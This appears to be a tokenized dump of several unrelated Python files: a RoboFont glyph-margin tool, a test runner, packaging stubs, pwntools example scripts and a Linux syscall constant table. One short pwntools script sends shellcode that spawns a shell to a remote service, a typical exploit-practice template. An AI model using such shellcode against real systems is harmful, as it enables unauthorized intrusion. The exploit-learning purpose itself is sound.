. rightMargin <EOL> if roundValues != <NUM_LIT:0> : <EOL> leftUnits = round ( leftUnits , roundValues ) <EOL> rightUnits = round ( rightUnits , roundValues ) <EOL> marginRecords [ g . name ] = leftUnits , rightUnits <EOL> for gname in gnames : <EOL> if f . has_key ( gname ) : <EOL> g = f [ gname ] <EOL> g . prepareUndo ( '<STR_LIT>' ) <EOL> leftUnits , rightUnits = marginRecords [ gname ] <EOL> g . leftMargin += leftUnits <EOL> g . 
rightMargin += rightUnits <EOL> if adjustComponents : <EOL> for comp in g . components : <EOL> if comp . baseGlyph in gnames : <EOL> compLeftUnits , compRightUnits = marginRecords [ comp . baseGlyph ] <EOL> comp . offset = ( comp . offset [ <NUM_LIT:0> ] - compLeftUnits , comp . offset [ <NUM_LIT:1> ] ) <EOL> g . performUndo ( ) <EOL> class AdjustMetrics ( BaseWindowController ) : <EOL> WINDOWTITLE = u'<STR_LIT>' <EOL> def __init__ ( self ) : <EOL> width = <NUM_LIT> <EOL> height = <NUM_LIT> <EOL> x = <NUM_LIT:20> <EOL> y = <NUM_LIT:20> <EOL> rightMargin = - <NUM_LIT:20> <EOL> itemHeight = <NUM_LIT> <EOL> lineHeight = <NUM_LIT> <EOL> fonts = AllFonts ( ) <EOL> self . fonts = sortFonts ( fonts ) <EOL> current = CurrentFont ( ) <EOL> self . w = Window ( ( width , height ) , self . WINDOWTITLE , autosaveName = self . WINDOWTITLE , minSize = ( width , height ) ) <EOL> self . w . adjustBothText = TextBox ( ( x , y , rightMargin , itemHeight ) , '<STR_LIT>' ) <EOL> y += lineHeight <EOL> self . w . adjustBothValue = EditText ( ( x , y , <NUM_LIT:50> , itemHeight ) , callback = self . adjustBothValueCallback ) <EOL> x += <NUM_LIT> <EOL> self . w . adjustBothUnit = RadioGroup ( ( x , y , <NUM_LIT> , itemHeight * <NUM_LIT:2> ) , [ '<STR_LIT>' , '<STR_LIT>' ] , callback = self . adjustBothUnitCallback ) <EOL> self . w . adjustBothUnit . set ( <NUM_LIT:0> ) <EOL> x = <NUM_LIT:20> <EOL> y += lineHeight * <NUM_LIT> <EOL> self . w . adjustLeftText = TextBox ( ( x , y , rightMargin , itemHeight ) , '<STR_LIT>' ) <EOL> y += lineHeight <EOL> self . w . adjustLeftValue = EditText ( ( x , y , <NUM_LIT:50> , itemHeight ) , callback = self . clearBothCallback ) <EOL> x += <NUM_LIT> <EOL> self . w . adjustLeftUnit = RadioGroup ( ( x , y , <NUM_LIT> , itemHeight * <NUM_LIT:2> ) , [ '<STR_LIT>' , '<STR_LIT>' ] , callback = self . clearBothCallback ) <EOL> self . w . adjustLeftUnit . set ( <NUM_LIT:0> ) <EOL> x = <NUM_LIT:20> <EOL> y += lineHeight * <NUM_LIT> <EOL> self . w . 
adjustRightText = TextBox ( ( x , y , rightMargin , itemHeight ) , '<STR_LIT>' ) <EOL> y += lineHeight <EOL> self . w . adjustRightValue = EditText ( ( x , y , <NUM_LIT:50> , itemHeight ) , callback = self . clearBothCallback ) <EOL> x += <NUM_LIT> <EOL> self . w . adjustRightUnit = RadioGroup ( ( x , y - <NUM_LIT:3> , <NUM_LIT> , itemHeight * <NUM_LIT:2> ) , [ '<STR_LIT>' , '<STR_LIT>' ] , callback = self . clearBothCallback ) <EOL> self . w . adjustRightUnit . set ( <NUM_LIT:0> ) <EOL> x = <NUM_LIT:20> <EOL> y += lineHeight * <NUM_LIT> <EOL> self . w . glyphSelection = RadioGroup ( ( x , y , rightMargin , itemHeight * <NUM_LIT:2> ) , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . w . glyphSelection . set ( <NUM_LIT:0> ) <EOL> y += lineHeight * <NUM_LIT> <EOL> self . w . adjustComponents = CheckBox ( ( x , y , rightMargin , itemHeight ) , '<STR_LIT>' ) <EOL> self . w . adjustComponents . set ( <NUM_LIT:1> ) <EOL> y += lineHeight <EOL> self . w . adjustBaseComponents = CheckBox ( ( x , y , rightMargin , itemHeight ) , '<STR_LIT>' ) <EOL> self . w . adjustBaseComponents . set ( <NUM_LIT:0> ) <EOL> y += lineHeight <EOL> self . w . ignoreZeroWidth = CheckBox ( ( x , y , rightMargin , itemHeight ) , '<STR_LIT>' ) <EOL> self . w . ignoreZeroWidth . set ( <NUM_LIT:1> ) <EOL> self . w . apply = Button ( ( x , - <NUM_LIT> , <NUM_LIT:100> , itemHeight ) , '<STR_LIT>' , callback = self . apply ) <EOL> self . w . cancel = Button ( ( x + <NUM_LIT> , - <NUM_LIT> , <NUM_LIT:100> , itemHeight ) , '<STR_LIT>' , callback = self . cancel ) <EOL> self . fs = Drawer ( ( <NUM_LIT:200> , <NUM_LIT> ) , self . w ) <EOL> fsx = <NUM_LIT:5> <EOL> fsy = <NUM_LIT:5> <EOL> self . fs . selectAllFonts = Button ( ( fsx , fsy , - <NUM_LIT> , itemHeight ) , '<STR_LIT>' , callback = self . selectAllFonts , sizeStyle = '<STR_LIT>' ) <EOL> self . fs . refreshFontList = Button ( ( - <NUM_LIT> , fsy , <NUM_LIT:30> , <NUM_LIT> ) , unichr ( <NUM_LIT> ) , callback = self . 
refreshFontList ) <EOL> fsy += <NUM_LIT> <EOL> self . fs . deselectAllFonts = Button ( ( fsx , fsy , - <NUM_LIT> , itemHeight ) , '<STR_LIT>' , callback = self . deselectAllFonts , sizeStyle = '<STR_LIT>' ) <EOL> fsy += <NUM_LIT> <EOL> self . fs . selectCurrentFont = Button ( ( fsx , fsy , - <NUM_LIT> , itemHeight ) , '<STR_LIT>' , callback = self . selectCurrentFont , sizeStyle = '<STR_LIT>' ) <EOL> fsy += <NUM_LIT> <EOL> fontNameList = [ ] <EOL> currentIndex = None <EOL> for x , f in enumerate ( self . fonts ) : <EOL> fontName = str ( f . info . familyName ) + '<STR_LIT:U+0020>' + str ( f . info . styleName ) <EOL> if fontName in fontNameList : <EOL> fontName = f . path <EOL> fontNameList . append ( fontName ) <EOL> if f == CurrentFont ( ) : <EOL> currentIndex = x <EOL> fsy += <NUM_LIT:5> <EOL> self . fs . fontSelect = List ( ( fsx , fsy , - <NUM_LIT:5> , - <NUM_LIT:5> ) , fontNameList ) <EOL> if currentIndex is not None : <EOL> self . fs . fontSelect . setSelection ( [ currentIndex ] ) <EOL> self . w . open ( ) <EOL> self . fs . open ( ) <EOL> def refreshFontList ( self , sender ) : <EOL> self . fonts = sortFonts ( AllFonts ( ) ) <EOL> fontNameList = [ ] <EOL> currentIndex = None <EOL> for x , f in enumerate ( self . fonts ) : <EOL> fontName = str ( f . info . familyName ) + '<STR_LIT:U+0020>' + str ( f . info . styleName ) <EOL> if fontName in fontNameList : <EOL> fontName = f . path <EOL> fontNameList . append ( fontName ) <EOL> if f == CurrentFont ( ) : <EOL> currentIndex = x <EOL> self . fs . fontSelect . set ( fontNameList ) <EOL> self . fs . fontSelect . setSelection ( [ currentIndex ] ) <EOL> def adjustBothUnitCallback ( self , sender ) : <EOL> self . w . adjustLeftUnit . set ( sender . get ( ) ) <EOL> self . w . adjustRightUnit . set ( sender . get ( ) ) <EOL> def adjustBothValueCallback ( self , sender ) : <EOL> self . w . adjustLeftValue . set ( sender . get ( ) ) <EOL> self . w . adjustRightValue . set ( sender . 
get ( ) ) <EOL> def clearBothCallback ( self , sender ) : <EOL> self . w . adjustBothValue . set ( '<STR_LIT>' ) <EOL> def selectAllFonts ( self , sender ) : <EOL> indexRange = range ( <NUM_LIT:0> , len ( self . fonts ) ) <EOL> self . fs . fontSelect . setSelection ( indexRange ) <EOL> def deselectAllFonts ( self , sender ) : <EOL> self . fs . fontSelect . setSelection ( [ ] ) <EOL> def selectCurrentFont ( self , sender ) : <EOL> for x , f in enumerate ( self . fonts ) : <EOL> if f == CurrentFont ( ) : <EOL> currentIndex = x <EOL> self . fs . fontSelect . setSelection ( [ currentIndex ] ) <EOL> def getSelectedFonts ( self ) : <EOL> selectedFonts = [ ] <EOL> for index in self . fs . fontSelect . getSelection ( ) : <EOL> selectedFonts . append ( self . fonts [ index ] ) <EOL> return selectedFonts <EOL> def makeMetricsAdjustment ( self , f , gnames ) : <EOL> """<STR_LIT:U+0020>""" <EOL> if self . w . ignoreZeroWidth . get ( ) : <EOL> newGnames = [ ] <EOL> for gname in gnames : <EOL> if f [ gname ] . width != <NUM_LIT:0> : <EOL> newGnames . append ( gname ) <EOL> gnames = newGnames <EOL> if self . w . adjustComponents . get ( ) : <EOL> adjustComponents = True <EOL> else : <EOL> adjustComponents = False <EOL> adjustLeftUnit = self . w . adjustLeftUnit . get ( ) <EOL> adjustRightUnit = self . w . adjustRightUnit . get ( ) <EOL> try : <EOL> leftValue = int ( self . w . adjustLeftValue . get ( ) ) <EOL> except : <EOL> if adjustLeftUnit == <NUM_LIT:0> : <EOL> leftValue = <NUM_LIT:0> <EOL> else : <EOL> leftValue = <NUM_LIT:1> <EOL> try : <EOL> rightValue = int ( self . w . adjustRightValue . 
get ( ) ) <EOL> except : <EOL> if adjustRightUnit == <NUM_LIT:0> : <EOL> rightValue = <NUM_LIT:0> <EOL> else : <EOL> rightValue = <NUM_LIT:1> <EOL> if adjustLeftUnit == <NUM_LIT:0> : <EOL> if adjustRightUnit == <NUM_LIT:0> : <EOL> addMargins ( f , gnames , leftValue , rightValue , adjustComponents = adjustComponents ) <EOL> else : <EOL> addMargins ( f , gnames , leftValue , <NUM_LIT:0> , adjustComponents = adjustComponents ) <EOL> multiplyMargins ( f , gnames , <NUM_LIT:1> , rightValue * <NUM_LIT> , adjustComponents = adjustComponents ) <EOL> if adjustLeftUnit == <NUM_LIT:1> : <EOL> if adjustRightUnit == <NUM_LIT:1> : <EOL> multiplyMargins ( f , gnames , leftValue * <NUM_LIT> , rightValue * <NUM_LIT> , adjustComponents = adjustComponents ) <EOL> else : <EOL> multiplyMargins ( f , gnames , leftValue * <NUM_LIT> , <NUM_LIT:1> , adjustComponents = adjustComponents ) <EOL> addMargins ( f , gnames , <NUM_LIT:0> , rightValue , adjustComponents = adjustComponents ) <EOL> f . update ( ) <EOL> def apply ( self , sender ) : <EOL> fonts = self . getSelectedFonts ( ) <EOL> for f in fonts : <EOL> if self . w . glyphSelection . get ( ) == <NUM_LIT:0> : <EOL> gnames = CurrentFont ( ) . selection <EOL> else : <EOL> gnames = f . _object . keys ( ) <EOL> if self . w . adjustBaseComponents . get ( ) : <EOL> additionalGnames = [ ] <EOL> for g in f : <EOL> if len ( g . components ) >= <NUM_LIT:1> and ( g . components [ <NUM_LIT:0> ] . baseGlyph in gnames ) and ( g . name not in gnames ) : <EOL> additionalGnames . append ( g . name ) <EOL> gnames += additionalGnames <EOL> print f , gnames <EOL> self . makeMetricsAdjustment ( f , gnames ) <EOL> def cancel ( self , sender ) : <EOL> self . w . close ( ) <EOL> OpenWindow ( AdjustMetrics ) </s>
<s> """<STR_LIT>""" <EOL> import unittest <EOL> import sys <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> test_suite = unittest . TestLoader ( ) . discover ( '<STR_LIT>' , pattern = '<STR_LIT>' ) <EOL> test_results = unittest . TextTestRunner ( verbosity = <NUM_LIT:2> ) . run ( test_suite ) <EOL> if not test_results . wasSuccessful ( ) : <EOL> sys . exit ( <NUM_LIT:1> ) </s>
from setuptools import setup

# Distribution metadata for this single-module package, gathered in one
# mapping and splatted into setup().
_METADATA = dict(
    name="<STR_LIT>",
    version='<STR_LIT>',
    description='<STR_LIT>',
    author='<STR_LIT>',
    author_email='<STR_LIT>',
    url='<STR_LIT>',
    py_modules=['<STR_LIT>'],
    install_requires=['<STR_LIT>'],
)

setup(**_METADATA)
from .config import config

# Single source of truth for the package version string.
__version__ = '<STR_LIT>'


def get_version():
    """Return the package's version string."""
    return __version__
<s> from pwn import * <EOL> context ( os = '<STR_LIT>' , arch = '<STR_LIT>' ) <EOL> if '<STR_LIT>' in pwn . args : <EOL> HOST = pwn . args [ '<STR_LIT>' ] <EOL> PORT = int ( pwn . args . get ( '<STR_LIT>' , <NUM_LIT> ) ) <EOL> r = remote ( HOST , PORT ) <EOL> else : <EOL> r = process ( '<STR_LIT>' ) <EOL> r . clean ( <NUM_LIT:1> ) <EOL> r . sendline ( '<STR_LIT>' ) <EOL> r . clean ( <NUM_LIT:1> ) <EOL> buf = '<STR_LIT>' <EOL> buf += p32 ( <NUM_LIT> ) <EOL> buf += p32 ( <NUM_LIT> ) <EOL> buf += asm ( shellcraft . sh ( ) ) <EOL> log . info ( "<STR_LIT>" % hexdump ( buf ) ) <EOL> r . sendline ( buf ) <EOL> r . clean ( <NUM_LIT:1> ) <EOL> r . interactive ( ) </s>
<s> """<STR_LIT>""" <EOL> from pwn import * <EOL> shell = ssh ( host = '<STR_LIT>' , user = '<STR_LIT>' , password = '<STR_LIT>' ) <EOL> log . info ( "<STR_LIT>" % shell . whoami ( ) ) <EOL> log . info ( "<STR_LIT>" % shell . pwd ( ) ) <EOL> tube = shell . run ( '<STR_LIT>' ) <EOL> tube . send ( "<STR_LIT>" ) <EOL> tube . shutdown ( "<STR_LIT>" ) <EOL> print tube . recvall ( ) <EOL> shell . set_working_directory ( ) <EOL> log . info ( "<STR_LIT>" % shell . pwd ( ) ) <EOL> shell . upload_data ( """<STR_LIT>""" , '<STR_LIT>' ) <EOL> shell . gcc ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> print shell [ '<STR_LIT>' ] <EOL> print shell . echo ( "<STR_LIT>" ) <EOL> print shell . echo ( [ "<STR_LIT:list>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> print shell [ "<STR_LIT>" ] <EOL> shell . interactive ( ) </s>
<s> from pwnlib . constants . constant import Constant <EOL> __NR_exit = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> __NR_fork = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> __NR_read = Constant ( '<STR_LIT>' , <NUM_LIT:3> ) <EOL> __NR_write = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> __NR_open = Constant ( '<STR_LIT>' , <NUM_LIT:5> ) <EOL> __NR_close = Constant ( '<STR_LIT>' , <NUM_LIT:6> ) <EOL> __NR_waitpid = Constant ( '<STR_LIT>' , <NUM_LIT:7> ) <EOL> __NR_creat = Constant ( '<STR_LIT>' , <NUM_LIT:8> ) <EOL> __NR_link = Constant ( '<STR_LIT>' , <NUM_LIT:9> ) <EOL> __NR_unlink = Constant ( '<STR_LIT>' , <NUM_LIT:10> ) <EOL> __NR_execve = Constant ( '<STR_LIT>' , <NUM_LIT:11> ) <EOL> __NR_chdir = Constant ( '<STR_LIT>' , <NUM_LIT:12> ) <EOL> __NR_time = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_mknod = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_chmod = Constant ( '<STR_LIT>' , <NUM_LIT:15> ) <EOL> __NR_lchown = Constant ( '<STR_LIT>' , <NUM_LIT:16> ) <EOL> __NR_break = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_oldstat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_lseek = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getpid = Constant ( '<STR_LIT>' , <NUM_LIT:20> ) <EOL> __NR_mount = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_umount = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setuid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getuid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_stime = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_ptrace = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_alarm = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_oldfstat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_pause = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_utime = Constant ( '<STR_LIT>' , <NUM_LIT:30> ) <EOL> __NR_stty = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_gtty = Constant ( '<STR_LIT>' , <NUM_LIT:32> ) <EOL> __NR_access = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_nice = Constant ( '<STR_LIT>' , 
<NUM_LIT> ) <EOL> __NR_ftime = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sync = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_kill = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_rename = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_mkdir = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_rmdir = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_dup = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_pipe = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_times = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_prof = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_brk = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setgid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getgid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_signal = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_geteuid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getegid = Constant ( '<STR_LIT>' , <NUM_LIT:50> ) <EOL> __NR_acct = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_umount2 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_lock = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_ioctl = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fcntl = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_mpx = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setpgid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_ulimit = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_oldolduname = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_umask = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_chroot = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_ustat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_dup2 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getppid = Constant ( '<STR_LIT>' , <NUM_LIT:64> ) <EOL> __NR_getpgrp = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setsid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sigaction = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sgetmask = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_ssetmask = Constant ( '<STR_LIT>' , <NUM_LIT> ) 
<EOL> __NR_setreuid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setregid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sigsuspend = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sigpending = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sethostname = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setrlimit = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getrlimit = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getrusage = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_gettimeofday = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_settimeofday = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getgroups = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setgroups = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_select = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_symlink = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_oldlstat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_readlink = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_uselib = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_swapon = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_reboot = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_readdir = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_mmap = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_munmap = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_truncate = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_ftruncate = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fchmod = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fchown = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getpriority = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setpriority = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_profil = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_statfs = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fstatfs = Constant ( '<STR_LIT>' , <NUM_LIT:100> ) <EOL> __NR_ioperm = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_socketcall = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_syslog = Constant ( '<STR_LIT>' , 
<NUM_LIT> ) <EOL> __NR_setitimer = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getitimer = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_stat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_lstat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fstat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_olduname = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_iopl = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_vhangup = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_idle = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_vm86old = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_wait4 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_swapoff = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sysinfo = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_ipc = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fsync = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sigreturn = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_clone = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setdomainname = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_uname = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_modify_ldt = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_adjtimex = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_mprotect = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sigprocmask = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_create_module = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_init_module = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_delete_module = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_get_kernel_syms = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_quotactl = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getpgid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fchdir = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_bdflush = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sysfs = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_personality = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_afs_syscall = Constant ( '<STR_LIT>' , 
<NUM_LIT> ) <EOL> __NR_setfsuid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setfsgid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR__llseek = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getdents = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR__newselect = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_flock = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_msync = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_readv = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_writev = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getsid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fdatasync = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR__sysctl = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_mlock = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_munlock = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_mlockall = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_munlockall = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sched_setparam = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sched_getparam = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sched_setscheduler = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sched_getscheduler = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sched_yield = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sched_get_priority_max = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sched_get_priority_min = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sched_rr_get_interval = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_nanosleep = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_mremap = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setresuid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getresuid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_vm86 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_query_module = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_poll = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_nfsservctl = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setresgid = Constant ( 
'<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getresgid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_prctl = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_rt_sigreturn = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_rt_sigaction = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_rt_sigprocmask = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_rt_sigpending = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_rt_sigtimedwait = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_rt_sigqueueinfo = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_rt_sigsuspend = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_pread = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_pwrite = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_chown = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getcwd = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_capget = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_capset = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sigaltstack = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sendfile = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getpmsg = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_putpmsg = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_vfork = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_ugetrlimit = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_mmap2 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_truncate64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_ftruncate64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_stat64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_lstat64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fstat64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_lchown32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> 